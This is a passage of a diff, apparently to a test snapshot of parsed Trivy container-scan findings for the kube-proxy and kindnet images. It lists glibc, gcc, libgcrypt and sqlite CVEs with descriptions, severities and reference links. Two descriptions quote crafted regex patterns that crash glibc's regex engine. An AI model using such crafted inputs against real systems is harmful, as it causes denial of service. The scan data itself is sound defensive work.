], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.5", - "packageName": "libdb5.3", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", - ], - }, - "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", - }, + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-13627", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - "http://www.openwall.com/lists/oss-security/2019/10/02/2", - "https://access.redhat.com/security/cve/CVE-2019-13627", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - "https://dev.gnupg.org/T4683", - "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", - "https://linux.oracle.com/cve/CVE-2019-13627.html", - "https://linux.oracle.com/errata/ELSA-2020-4482.html", - "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", - "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", - "https://minerva.crocs.fi.muni.cz/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", - "https://security-tracker.debian.org/tracker/CVE-2019-13627", - "https://security.gentoo.org/glsa/202003-32", - "https://ubuntu.com/security/notices/USN-4236-1", - "https://ubuntu.com/security/notices/USN-4236-2", - "https://ubuntu.com/security/notices/USN-4236-3", - "https://usn.ubuntu.com/4236-1/", - "https://usn.ubuntu.com/4236-2/", - "https://usn.ubuntu.com/4236-3/", - "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: ECDSA timing attack allowing private key leak", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-13627", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-13627", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - }, - { - "type": "URL", - 